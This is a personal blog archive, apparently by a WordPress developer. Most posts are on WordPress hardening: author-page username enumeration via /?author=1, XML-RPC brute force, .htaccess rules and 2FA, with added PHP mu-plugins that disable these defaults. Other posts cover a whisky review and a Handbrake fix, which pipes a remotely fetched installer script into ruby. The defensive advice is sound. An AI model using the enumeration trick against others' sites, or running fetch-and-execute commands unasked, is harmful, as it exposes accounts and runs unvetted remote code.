Instant Cookie Expire – my first WordPress plugin

Recently, I published my first WordPress plugin: https://wordpress.org/plugins/instant-cookie-expire/. It’s a very basic plugin that does just one thing: it sets the expiry of the cookie WordPress issues when you enter the password of a password-protected post to “instant” instead of “10 days”.

This solves the problem that, once the password has been entered, a password-protected post stays accessible for the next 10 days without the password being asked again. In some cases this isn’t the wanted behaviour, so I crafted this one-line plugin.

Primarily, though, this was a test case: I wanted to learn the workflow of building WordPress plugins and publishing them to the repository. Currently I’m building my very own WordPress security plugin (over 1500 lines of code already and still counting), which I hope to release by the end of 2016.

Of course I’ll keep you all posted!

WordPress and user enumeration through Author Pages rant

Yes. This will be a bit of a rant about WordPress.

Don’t get me wrong. I love and adore WordPress. Hell, I live WordPress. But there are just some things I really don’t like about it (at least from a security perspective).

Most of my major issues are with the default settings of a clean install of WordPress. I’m talking about features such as the XML-RPC protocol, author pages, file editing in the backend (on themes, plugins and core files).

Let’s take “author pages” as an example. I know from experience that only a fairly limited number of sites running WordPress actually use this feature.
However, when author pages are active, it’s easy to derive the usernames. That leaves an attacker with only the password left to find before they’re inside your backend.

If you’d like to see the impact, just append “/?author=1” to your domain name in the address bar. If author pages are active, it’ll redirect to a URL that contains something like “/author/username”, and this “username” is the one you actually use to log into the wp-admin backend.

And yes, I know there are plugins that can block this for you (such as https://nl-be.wordpress.org/plugins/disable-author-pages/ and several security plugins that offer it as an option), but that’s not my point.

The thing is that these settings are active by default, without an option in the WordPress backend to easily disable them.

My proposition:
Let’s make these functions an “opt-in” functionality. Let them be disabled by default and let’s make it possible to enable them if this is really needed for a specific website. This would make a huge number of WordPress sites that little bit more secure.

I’ve decided I won’t sit back, and I’ve already started working on a security plugin that disables all of these features and creates an “opt-in” menu under “Settings” in the WordPress backend. More on that soon!
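
As an added example (my own code, not the Instant Cookie Expire plugin or the security plugin announced above), here is a drop-in mu-plugin that makes the password-cookie behaviour from the first post and two of the defaults from this rant (author pages and backend file editing) opt-in; the OPTIN_* constants are names I made up for this example.

```php
<?php
/**
 * Plugin Name: Opt-in Hardening (added example)
 * Description: Drop this file in wp-content/mu-plugins/. Each feature below
 *              stays off unless the site owner opts in by defining the matching
 *              OPTIN_* constant (example names) as true in wp-config.php.
 */
defined( 'ABSPATH' ) || exit;

function optin_enabled( $constant ) {
    return defined( $constant ) && constant( $constant );
}

// 1. Password-protected posts: WordPress sets its wp-postpass_* cookie to
//    expire after 10 days. Returning 0 makes it a session cookie, so the
//    password is asked again as soon as the browser is closed.
add_filter( 'post_password_expires', function ( $expire ) {
    return optin_enabled( 'OPTIN_LONG_POSTPASS' ) ? $expire : 0;
} );

// 2. Author pages: "/?author=N" normally 301s to "/author/<login-name>".
//    Priority 1 runs this before redirect_canonical() (priority 10) does that.
add_action( 'template_redirect', function () {
    if ( optin_enabled( 'OPTIN_AUTHOR_PAGES' ) ) {
        return;
    }
    // Covers the query-string form and the pretty-permalink archive itself.
    if ( is_author() || isset( $_GET['author'] ) ) {
        wp_safe_redirect( home_url( '/' ), 301 );
        exit;
    }
}, 1 );

// 3. Theme/plugin file editing in the backend: off unless opted in.
//    Defining the core constant here works because mu-plugins load before
//    any capability check for edit_themes / edit_plugins.
if ( ! optin_enabled( 'OPTIN_FILE_EDIT' ) && ! defined( 'DISALLOW_FILE_EDIT' ) ) {
    define( 'DISALLOW_FILE_EDIT', true );
}
```

After dropping the file in place, requesting /?author=1 should land on the home page instead of revealing /author/username.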


8 great resources for stock photos

When producing content for your site or blog, you’d usually want to add a great picture to your page or article. However, most stock photos are quite expensive. But thankfully, there are several sites that provide high quality stock photos that are free, even for commercial use. Here’s a list of 8 sites I use the most:

Have fun creating/publishing!

Block xmlrpc attacks via .htaccess

XML-RPC is a protocol that is enabled by default in WordPress, and since version 3.5 the option to disable it has been removed from the WordPress backend. Since this protocol is prone to attacks (a single request can try several hundred username and password combinations), it’s paramount to disable it.

You could do this through a plugin, but a more efficient way is to add the following RewriteRule to your .htaccess:

# Block xmlrpc.php; place this above the WordPress rewrite rules so it runs first.
# The dot is escaped so the pattern matches a literal "." and not any character.
# Use "- [F,L]" instead of the redirect target if you prefer a 403 Forbidden.
RewriteEngine On
RewriteRule ^xmlrpc\.php$ "http://0.0.0.0/" [R=301,L]
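
The plugin route the post mentions, as an added example (my own code, not any published plugin): it disables the protocol through WordPress’ own xmlrpc_enabled filter and also removes system.multicall, the method that lets one request carry hundreds of login attempts. OPTIN_XMLRPC is a constant name I assume for this example.

```php
<?php
/**
 * Plugin Name: XML-RPC lockdown (added example)
 * Description: Drop this file in wp-content/mu-plugins/ as the plugin-based
 *              alternative to the .htaccess rule above.
 */
defined( 'ABSPATH' ) || exit;

// Default: refuse every authenticated XML-RPC call. WordPress checks this
// filter in wp_xmlrpc_server::login(), so password guessing via xmlrpc.php
// gets a "XML-RPC services are disabled on this site" fault instead of a
// login attempt. Define OPTIN_XMLRPC (example name) as true to opt back in.
if ( ! ( defined( 'OPTIN_XMLRPC' ) && OPTIN_XMLRPC ) ) {
    add_filter( 'xmlrpc_enabled', '__return_false' );
}

// Even when XML-RPC is opted in, drop the method behind the attack described
// above (system.multicall bundles hundreds of login attempts into one
// request) and pingback.ping, which is reachable without any login.
add_filter( 'xmlrpc_methods', function ( $methods ) {
    unset( $methods['system.multicall'], $methods['pingback.ping'] );
    return $methods;
} );

// Stop advertising the endpoint: WordPress adds an X-Pingback header to
// singular pages that accept pings.
add_filter( 'wp_headers', function ( $headers ) {
    unset( $headers['X-Pingback'] );
    return $headers;
} );
```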

Gouden Carolus – Belgian Single Malt review

If you know me personally, you know I’m quite a fan of a glass of whisky now and then. So I thought it would be nice to share some of my experiences and opinions. And in this first review, I gladly present to you the Gouden Carolus, a single malt whisky from “De Molenberg”.

While Gouden Carolus isn’t the first Belgian Single Malt I’ve tasted or bought, it has quickly become my go-to whisky for introducing people to the wonderful world of whisky. It is surprisingly soft to drink, lacking the harsh burning sensation of some more aged whisky varieties. But it also features just a hint of “crème brûlée”, which manifests itself after a little while. Being fond of sweets myself, I certainly could appreciate this surprise, as this wasn’t a taste I expected to find in a whisky.

While this whisky hasn’t won any awards (as far as I am aware), you shouldn’t miss out on this little-known pearl in the Belgian whisky landscape. If you loved the Belgian Owl, you’re very likely going to love this one, since it’s just as soft and smooth to drink and features a very refined taste.

The Gouden Carolus is a whisky distilled from the mash of the Gouden Carolus beer, which beer lovers know as an absolute classic and a very popular beer. The distillery is based in the Belgian city of Mechelen and can be visited. They’ve also started to offer variations on their Gouden Carolus Single Malt, such as the Gold Fusion and the Bourbon Cask 36, which I hope to taste and review here soon.


Fixing Handbrake on El Capitan

Most of you who know me personally know I’m quite fanatical when it comes to my DVDs. So once I buy a new one, I usually take it out of the box once, to digitize it using Handbrake, and only play it digitally from my NAS. The DVD boxes are then cleaned and stored in alphabetical order in my DVD collection, never to be played again (so my discs do not suffer any wear).

Since I haven’t bought many DVDs lately, mostly due to the birth of my daughter last year (and my time being spent with her instead of my computer), I was rather surprised to notice that backing up my DVDs to a digital file no longer works on Mac OS X El Capitan when using Handbrake.

I kept getting the error notification “no valid source” after scanning my DVD.

The cause:
Due to stricter security in El Capitan, libdvdcss is no longer present, and Handbrake needs it to be able to create a backup.

The solution:
We can install libdvdcss again using Homebrew.

First we’ll need to open a Terminal window. Next, paste and execute this command:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

Then run this command:
brew install libdvdcss

Now restart Handbrake and voilà… it works!

Hiding your htaccess file

A great way to improve your security is hiding your .htaccess file, since this file usually contains quite a bit of information that reveals the structure of your website or the content management system that was used to create the site. This can be done in two distinct steps:

1. htaccess file permissions

First you’ll need to set the file permissions of your .htaccess to 644.

2. Add this to your .htaccess file

# secure htaccess file (Apache 2.4 syntax, with the 2.2 fallback)
<Files .htaccess>
  <IfModule mod_authz_core.c>
    Require all denied
  </IfModule>
  <IfModule !mod_authz_core.c>
    order allow,deny
    deny from all
  </IfModule>
</Files>

Hello world!

Welcome to my new blog.

As you’ve probably noticed, it’s out with brechtryckaert.be and in with brechtryckaert.com. But that’s not all that’s about to change. As a resolution for 2016, I’ve taken it upon myself to dive further into the world of content management systems and review a CMS unknown to me every couple of weeks.

Besides these posts, I’ll try to post as much content as possible (on security, WordPress and Sitecake).

Hope to meet you again here soon!

Brecht


WordPress security improvement: adding 2-factor authentication

Another great way to improve the overall security of your WordPress website is by adding two-factor authentication to your WordPress security measures. It improves your security because it requires two separate elements to be presented before a user is granted access, which by default is a better solution than just a username and password combination. Two-factor authentication usually requires you to enter a PIN code or token of some sort and to validate another element before access is granted.

How this improves your WordPress security

Using 2-factor authentication helps to effectively protect your website against the following attacks and vulnerabilities:

  • Brute-forcing attacks
  • Weak passwords set by the end-user
  • Passwords that have been intercepted via man-in-the-middle attacks

But that’s enough theoretical chitchat already. Let’s go over the best options available today:


Installing Odoo on Debian 7


Recently I tried to figure out how one could install Odoo on a Debian 7 machine, since the documentation on the official website seemed to describe a set of instructions that didn’t work for me. Here’s how I was able to get it working with a variation on the official installation instructions.

